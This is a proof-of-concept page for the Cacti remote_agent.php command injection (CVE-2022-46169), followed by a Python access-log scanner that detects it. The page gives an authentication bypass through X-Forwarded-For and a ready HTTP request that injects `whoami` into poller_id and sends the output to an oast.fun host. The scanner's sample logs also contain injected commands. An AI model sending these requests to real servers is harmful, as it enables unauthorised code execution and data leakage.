CVE-2022-46169 PoC: Cacti Command Injection Vulnerability

Associated vulnerability

Title: Cacti Command Injection Vulnerability (CVE-2022-46169)

Description: Cacti is an open-source network traffic monitoring and analysis tool from the Cacti team. It collects data via snmpget, draws graphs with RRDtool for analysis, and provides data and user management features. Cacti v1.2.22 contains a command injection vulnerability: an unauthenticated command injection that allows an unauthenticated user to execute arbitrary code on the server running Cacti.

Readme
# CVE-2022-46169

CVE-2022-46169 Cacti remote_agent.php Unauthenticated Command Injection.

## Auth Bypass

Add an `X-Forwarded-For` header to bypass authentication; note that its value is not fixed.

![image](https://user-images.githubusercontent.com/40891670/206341900-5b4b4a59-92c5-4d19-9913-e97c1aa44180.png)

![image](https://user-images.githubusercontent.com/40891670/206342934-3e2f99e3-8ae6-406c-b28b-38bc6fd6c21c.png)

## Brute Force

Use Burp Intruder to fuzz the values of `host_id` and `local_data_ids`.

![image](https://user-images.githubusercontent.com/40891670/206341202-253e43ec-da5b-43d1-8d3a-2e36c9041605.png)

![image](https://user-images.githubusercontent.com/40891670/206341491-aa41526b-12f8-4e97-999b-90f14a1d301b.png)

## RCE

The command injection point is the `poller_id` parameter.

```http
GET /cacti/remote_agent.php?action=polldata&poller_id=;ping%20-c%202%20`whoami`.ccsy8s32vtc0000x5nagg8rkyboyyyyyc.oast.fun&host_id=2&local_data_ids[]=6 HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (X11; U; Linux armv6l; rv 1.8.1.5pre) Gecko/20070619 Minimo/0.020
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close
X-Forwarded-For: 127.0.0.1


```

![image](https://user-images.githubusercontent.com/40891670/206337930-d1c2c044-b7ea-47ff-a740-9f8320594816.png)
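As an added example (not part of the PoC repository), a small Python scanner that flags web-server access-log entries where `remote_agent.php` is requested with a non-numeric `poller_id`, which is the request shape shown above. It assumes the Apache/nginx combined log format; the log lines below are constructed samples, not captured traffic.

```python
import re
from urllib.parse import urlsplit, unquote_plus

# Constructed sample access-log lines (combined format); not real traffic.
SAMPLE_LOG = """\
10.0.0.5 - - [10/Dec/2022:10:01:02 +0000] "GET /cacti/remote_agent.php?action=polldata&poller_id=1&host_id=2&local_data_ids[]=6 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.9 - - [10/Dec/2022:10:01:07 +0000] "GET /cacti/remote_agent.php?action=polldata&poller_id=;id&host_id=2&local_data_ids[]=6 HTTP/1.1" 200 0 "-" "curl/7.81.0"
10.0.0.9 - - [10/Dec/2022:10:01:09 +0000] "GET /cacti/remote_agent.php?action=polldata&poller_id=%3bping%20-c%202%20example.invalid&host_id=3&local_data_ids[]=7 HTTP/1.1" 200 0 "-" "curl/7.81.0"
10.0.0.7 - - [10/Dec/2022:10:02:00 +0000] "GET /cacti/graph_view.php?action=tree HTTP/1.1" 200 8192 "-" "Mozilla/5.0"
"""

# Combined log format: client IP, identity, user, [timestamp], "METHOD target PROTO", status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
# A legitimate poller_id is a plain integer; anything else is worth a look.
SAFE_ID = re.compile(r"^\d+$")


def query_values(query, name):
    """Return all percent-decoded values of `name`, splitting on '&' only so a ';' in a value survives."""
    values = []
    for pair in query.split("&"):
        key, _, val = pair.partition("=")
        if unquote_plus(key) == name:
            values.append(unquote_plus(val))
    return values


def suspicious_poller_id(target):
    """Return the decoded poller_id when a remote_agent.php request carries a non-numeric one, else None."""
    parts = urlsplit(target)
    if not parts.path.endswith("/remote_agent.php"):
        return None
    for value in query_values(parts.query, "poller_id"):
        if not SAFE_ID.match(value):
            return value
    return None


def scan_log(text):
    """Yield (client_ip, timestamp, poller_id) for every suspicious request in the log text."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than guess
        bad = suspicious_poller_id(m.group("target"))
        if bad is not None:
            hits.append((m.group("ip"), m.group("ts"), bad))
    return hits


if __name__ == "__main__":
    for ip, ts, value in scan_log(SAMPLE_LOG):
        print(f"{ts} {ip} non-numeric poller_id: {value!r}")
```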


## Reference

- https://github.com/Cacti/cacti/security/advisories/GHSA-6p93-p743-35gf